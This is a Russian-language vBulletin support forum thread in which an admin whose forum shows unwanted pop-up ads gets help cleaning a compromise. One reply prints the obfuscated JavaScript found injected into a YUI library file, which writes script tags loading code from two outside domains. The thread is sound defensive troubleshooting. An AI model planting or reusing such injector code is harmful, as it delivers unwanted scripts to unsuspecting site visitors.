VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
Добрый день, сегодня захожу на свой форум и при клике по логотипу, либо при открытии разделов форума, периодически открываются рекламные окна. По всей видимости кто-то каким-то образом что-то взломал и добавил.
Проверил в админке установленные модули - ничего нового и подозрительного нет.
Подскажите пожалуйста как найти где проблема? как пофиксить?
Стандартные действия при подозрении на взлом:
1. сменить все пароли, особенно тем, кто имеет доступ в админку, уволить всех админов, кто давно не был на форуме
2. искать в шаблонах, раз проблема при клике на картинку, обратить внимание на "Замещаемые переменные"
3. при любом раскладе пересохранить в админке один любой модуль
4. прогнать файловую систему Ай-болитом Скрипт для поиска вредоносного ПО "AI-Bolit"
@WebEditor
Почти новичок
Join Date: Nov 2012
Posts: 49
Версия vB: 4.2.х
Пол:
Reputation:
Novice 3
Репутация в разделе: 0
0
Quote:
Originally Posted by Luvilla
Стандартные действия при подозрении на взлом:
1. сменить все пароли, особенно тем, кто имеет доступ в админку, уволить всех админов, кто давно не был на форуме
2. искать в шаблонах, раз проблема при клике на картинку, обратить внимание на "Замещаемые переменные"
3. при любом раскладе пересохранить в админке один любой модуль
4. прогнать файловую систему Ай-болитом Скрипт для поиска вредоносного ПО "AI-Bolit"
1. Админ я один, пароль сложный
2. Оказывается не при клике на картинку, а при первом клике куда либо на форуме появляется рекламное окно
3. Что Вы имеете ввиду?
4. Можно подробную инструкцию как это сделать в vbulletin? скачал скрипт, прочитал readme, но что то слишком сложно для меня.
@WebEditor, это форум не тот, ссылка на который в профиле указана?)
@WebEditor
Почти новичок
Join Date: Nov 2012
Posts: 49
Версия vB: 4.2.х
Пол:
Reputation:
Novice 3
Репутация в разделе: 0
0
maritimeforum.net
WebEditor добавил 12.04.2017 в 11:41
Скопировал папку ai-bolit в корень сайта на хостинге.
Как выполнить команду в командной строке?
php ai-bolit.php
Подскажите пожалуста
Last edited by WebEditor : 04-12-2017 at 12:41 PM.
Reason: Добавлено сообщение
@Konkere
Знаток
Join Date: Dec 2005
Location: Москва
Posts: 567
Версия vB: 4.2.х
Пол:
Reputation:
Knowing 293
Репутация в разделе: 30
1
Для начала попробуйте использовать внешние библиотеки YUI (Googl или Yahoo!)
Админка=>Оптимизация и настройки сервера=>Использовать внешнюю YUI
Уж больно интересная первая строчка в скрипте clientscript/yui/connection/connection-min.js
Code:
var _0xe62f=["\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6F\x65\x69\x31\x2E\x67\x71\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65","\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6D\x66\x69\x6F\x2E\x63\x66\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E"];document[_0xe62f[1]](_0xe62f[0]);document[_0xe62f[1]](_0xe62f[2])
У меня такой нет
Ну а потом разбирайтесь как она туда попала и кто мог получить доступ по ftp или каким другим способом.
Похоже на подмену файла.
Целостность остальных файлов тоже не мешало бы проверить: Админка=>Обслуживание=>Диагностика=>Подозрительные версии файлов
@WebEditor
Почти новичок
Join Date: Nov 2012
Posts: 49
Версия vB: 4.2.х
Пол:
Reputation:
Novice 3
Репутация в разделе: 0
0
@Konkere, Вы правы!!! Спасибо огромное, сделал как Вы сказали и рекламные окна исчезли!
Тогда вопрос, каким образом кто-то смог внести изменения в этот файл? Причем последнее изменение файла 25.11.2012 - т.е. дата не менялась с момента установки форума.
Это можно сделать только через ftp или есть какие-то еще возможности? как защититься?
WebEditor добавил 12.04.2017 в 12:58
Сейчас перепроверил еще раз, теперь рекламные окна выскакивают только когда я переходу в режим админки. На самом форуме перестали. Может еще какой-то файл нужно править, чтобы в админ панели не выскакивали?
Last edited by WebEditor : 04-12-2017 at 01:58 PM.
Reason: Добавлено сообщение
@Konkere
Знаток
Join Date: Dec 2005
Location: Москва
Posts: 567
Версия vB: 4.2.х
Пол:
Reputation:
Knowing 293
Репутация в разделе: 30
0
Quote:
Originally Posted by WebEditor
Может еще какой-то файл нужно править, чтобы в админ панели не выскакивали?
Я же написал:
Quote:
Originally Posted by Konkere
Целостность остальных файлов тоже не мешало бы проверить: Админка=>Обслуживание=>Диагностика=>Подозрительные версии файлов